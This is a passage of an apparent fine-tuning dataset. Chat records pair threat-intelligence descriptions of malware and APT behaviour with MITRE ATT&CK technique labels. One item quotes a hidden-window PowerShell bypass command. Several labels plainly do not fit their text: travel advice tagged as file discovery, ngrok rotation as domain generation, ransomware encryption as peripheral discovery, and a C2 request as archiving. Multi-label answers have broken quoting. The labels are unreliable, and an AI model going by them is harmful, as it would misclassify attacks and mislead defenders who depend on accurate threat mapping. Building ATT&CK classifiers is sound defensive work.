- "content": "Before executing the main payload, the QakBot loader will first test the infected system to see if it is a good candidate for infection. Figure 5 below shows a high-level execution flow of the QakBot loader"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery', 'T1518.001 - Software Discovery: Security Software Discovery', 'T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rifdoor has created a new registry entry at \"HKEY_CURRENT_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Graphics\" with a value of \"C:\\ProgramData\\Initech\\Initech.exe /run\"."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Gamaredon Group file stealer can transfer collected files to a hardcoded C2 server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 has downloaded additional malware to execute on the victim's machine, including by using a PowerShell script to launch shellcode that retrieves an additional payload."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 modified timestamps of backdoors to match legitimate Windows files."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has dropped and executed SecretsDump to dump password hashes."
- },
- {
- "role": "assistant",
- "content": "T1003.002 - OS Credential Dumping: Security Account Manager', 'T1003.004 - OS Credential Dumping: LSA Secrets"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Koadic has used the command \"Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden\" to hide its window."
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The instrumentor script also performs a cleanup of the cookies for Google Chrome and Microsoft Edge browsers. This activity is performed after the implants are in place to force users to reauthenticate. This is done by simply terminating any browser processes running on the system and then deleting the cookie files on disk"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These Microsoft Office templates are hosted on a command and control server and the downloaded link is embedded in the first stage malicious document"
- },
- {
- "role": "assistant",
- "content": "T1584.004 - Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "lured victims to double-click on images in the attachments they sent which would then execute the hidden LNK file."
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has used social media platforms to hide communications to C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stolen Pencil has used tools that are capable of obtaining credentials from saved mail."
- },
- {
- "role": "assistant",
- "content": "T1552.001 - Unsecured Credentials: Credentials In Files"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has scanned for vulnerabilities in IoT devices and other related resources such as the Docker API."
- },
- {
- "role": "assistant",
- "content": "T1595.002 - Vulnerability Scanning"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a command-line interface to interact with systems."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NetTraveler reports window names along with keylogger information to provide application context."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Out1 can use native command line for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The string “fjzmpcjvqp” is unique and not something likely to be present if the code was not generated with the same public POC exploit code"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Misdat is capable of deleting Registry keys used for persistence."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host', 'T1070.009 - Clear Persistence"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Saint Bot can collect files and information from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Obscure secure messaging client as delivery vehicle for malware and cloak for malicious activity"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The executables installed by the compiled AutoIt scripts is a backdoor that Molerats has used in many attack campaigns. Based on our research, the Spark backdoor has been used by Molerats since at least early 2017, as it was the main payload in the Operation Parliament campaign reported by Kaspersky"
- },
- {
- "role": "assistant",
- "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mustang Panda has used names like `adobeupdate.dat` and `PotPlayerDB.dat` to disguise PlugX, and a file named `OneDrive.exe` to load a Cobalt Strike payload."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkWatchman can track key presses with a keylogger module."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Generate payloads in various formats: Format Architecture Short Name Android Package x86 & ARMv7 apk Linux Binary x86 lin_x86 Linux Binary x64 lin_x64 Linux Shared Object x86 so_x86 Linux Shared Object x64 so_x64 Windows PE Executable x86 exe_x86 Windows PE Executable x64 exe_x64 Windows DLL x86 dll_x86 Windows DLL x64 dll_x64 Python Script x86 & x64 py PyInstaller x86 & x64 pyinst Python Oneliner x86 & x64 py_oneliner Powershell x86 & x64 ps1 Powershell Oneliner x86 & x64 ps1_oneliner Ducky Script N/A rubber_ducky Deploy in memory from a single command line using python or powershell one-liners"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API', 'T1010 - Application Window Discovery', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 used other victims as proxies to relay command traffic, for instance using a compromised Georgian military email server as a hop point to NATO victims. The group has also used a tool that acts as a proxy to allow C2 even if the victim is behind a router. APT28 has also used a machine to relay and obscure communications between CHOPSTICK and their server."
- },
- {
- "role": "assistant",
- "content": "T1090.002 - External Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "xCaon has used Base64 to encode its C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As Hui explains, this happens because ngrok.io URLs stay online for only around 12 hours, and by the time security researchers identify a new C&C URL, the ngrok.io link changes to a new one, hiding the botnet from researchers once more. This allows the botnet to survive more than other botnets that host C&C servers on popular hosting platforms where security firms can usually intervene via abuse requests"
- },
- {
- "role": "assistant",
- "content": "T1568.002 - Domain Generation Algorithms"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RAR archiving – files are transferred to staging servers before exfiltration. Certutil – a command-line utility that can be exploited and used for various malicious purposes, such as to decode information, to download files, and to install browser root certificates. Adfind – a command-line tool that can be used to perform Active Directory queries. Csvde – can be used to extract Active Directory files and data. Ntdsutil – can be used as a credential-dumping tool. WMIExec – can be used for lateral movement and to execute commands remotely. It can be used to find information and execute code, and is frequently abused by malicious actors"
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FunnyDream can use a Registry Run Key and the Startup folder to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used a cloud-based remote access software called LogMeIn for their attacks."
- },
- {
- "role": "assistant",
- "content": "T1219 - Remote Access Software"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "attempts to download an encrypted binary from a specified domain."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Silence has used a valid certificate to sign their primary loader Silence.Downloader (aka TrueBot)."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Actors behind Agent Tesla campaigns have also used malicious Office documents to facilitate first-stage delivery. Specially-crafted documents, exploiting Office vulnerabilities such as CVE-2017-11882 and CVE-2017-8570, have been leveraged, even in present day campaigns. These and similar exploits allow for quick delivery and execution with minimal user interaction (beyond opening the malicious documents and allowing active content to proceed"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The document also contained a lure image, similar to ones commonly found in malicious macro documents which ask the user to click on “Enable Content” as seen in Figure 2"
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has also used PowerSploit's \"Invoke-ReflectivePEInjection.ps1\" to reflectively load a PowerShell payload into a random process on the victim system."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pony is a popular downloader program that can download additional malware onto the infected system. It is also equipped with a number of plugins that may be used to steal stored credentials for various applications such as FTP clients, web browsers, email clients, and other software. Pony is also commonly known as Fareit."
- },
- {
- "role": "assistant",
- "content": "T1539 - Steal Web Session Cookie', 'T1555 - Credentials from Password Stores"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of configuring itself as a service."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zirconium is using what are referred to as web bugs, or web beacons, tied to a domain they purchased and populated with content. Although the domain itself may not have malicious content, the web bug allows Zirconium to check if a user attempted to access the site"
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GCMAN uses VNC for lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1021.005 - Remote Services:VNC"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The organization managed to discover what scripts were hosted on the server before BE/SandWorm gang deleted them, and unfortunately couldn’t restore them after they were deleted"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM has used spearphishing attachments to distribute its malware."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The encryption style does not differ significantly from other prominent ransomware families. WastedLocker will attempt to encrypt files on local as well as remote (network adjacent and accessible) and removable drives. Once the eligible drives are located, the ransomware will begin the encryption process"
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects user files from the compromised host based on predefined file extensions."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-1314 actors used a victim's endpoint management platform, Altiris, for lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1072 - Software Deployment Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bisonal has been loaded through a `.wll` extension added to the ` %APPDATA%\\microsoft\\word\\startup\\` repository."
- },
- {
- "role": "assistant",
- "content": "T1137.006 - Office Application Startup: Add-ins"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zeus Panda uses PowerShell to download and execute the payload."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Drovorub can use TCP to communicate between its agent and client modules."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation CuckooBees, the threat actors executed an encoded VBScript file using `wscript` and wrote the decoded output to a text file."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GALLIUM used a modified version of HTRAN to redirect connections between networks."
- },
- {
- "role": "assistant",
- "content": "T1090.002 - External Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ComRAT has used \"cmd.exe\" to execute commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Babuk can use multiple Windows API calls for actions on compromised hosts including discovery and execution."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In one intrusion, the first second-stage custom loader (TEARDROP) was introduced to the environment by BusinessLayerHost.exe at around 10:00 AM UTC. 7z.dll), Far Manager (e.g. The Variant 2 custom loaders were mostly compiled from open-source source code of legitimate applications, such as 7-Zip and Far Manager (i.e. the open-source source code for these applications was modified to add in the malicious code). In some instances, certain development artifacts were left behind in the custom loader samples. For example, the following C++ header (.hpp) path was observed in a loader compiled from a modified Far Manager open-source source code (c:\\build\\workspace\\cobalt_cryptor_far (dev071)\\farmanager\\far\\platform.concurrency.hpp"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Business and government personnel who are traveling, especially in a foreign country, often rely on systems to conduct business other than those at their home office, and may be unfamiliar with threats posed while abroad"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects MAC address and local IP address information from the victim."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The captured sample used in this analysis is an MSI file named “view-(AVISO)2020.msi” that is spread through a ZIP archive, just as with the previous variant. In the previous analysis, I showed that this MSI file is parsed and executed automatically by MsiExec.exe when a user double clicks on it in Windows OS"
- },
- {
- "role": "assistant",
- "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can record keystrokes from both the keyboard and virtual keyboard."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - xxmm downloader (also known as KVNDM) — This simple downloader's code is similar to the main xxmm payload. MSGet — This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. MSGet typically downloads encoded binaries from hard-coded URLs. Use the ‘at' or ‘schtask' commands to register a scheduled task to be executed in a few minutes. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. In particular, review network access for use of mobile USB modems on corporate systems"
- },
- {
- "role": "assistant",
- "content": "T1102.001 - Dead Drop Resolver"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors have been observed using multiple implants with file system enumeration and traversal capabilities."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "probes the system to check for sandbox/virtualized environments and other antimalware processes."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This component achieves persistence through the Run registry key and has full backdoor capabilities: it can download and execute binaries, run arbitrary commands or upload files from the victim computer to the C&C server"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fysbis can collect information about running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After the configuration is parsed, Cardinal RAT will proceed with making attempts at connecting with the C2. Using an example request and response from a C2 server, we can see how this traffic is configured"
- },
- {
- "role": "assistant",
- "content": "T1560.002 - Archive Collected Data: Archive via Library"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used scheduled tasks to automatically log out of created accounts every 8 hours as well as to execute malicious files."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Goopy has the ability to communicate with its C2 over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has enumerated sessions and users on a remote host, and identified privileged users logged into a targeted system."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkHydrus used an open-source tool, Phishery, to inject malicious remote template URLs into Microsoft Word documents and then sent them to victims to enable Forced Authentication."
- },
- {
- "role": "assistant",
- "content": "T1221 - Template Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "menuPass has used key loggers to steal usernames and passwords."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has used multiple layers of encryption within malware to protect C2 communication."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can gather information on the mapped drives, OS version, computer name, and memory size."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During C0015, the threat actors used WMI to load Cobalt Strike onto additional hosts within a compromised network."
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
